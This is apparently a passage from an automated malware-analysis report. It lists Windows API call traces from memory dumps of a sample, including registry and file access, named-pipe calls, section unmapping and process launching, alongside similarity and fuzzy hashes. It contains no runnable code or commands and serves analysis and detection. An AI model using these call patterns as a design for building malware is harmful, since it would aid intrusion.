  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
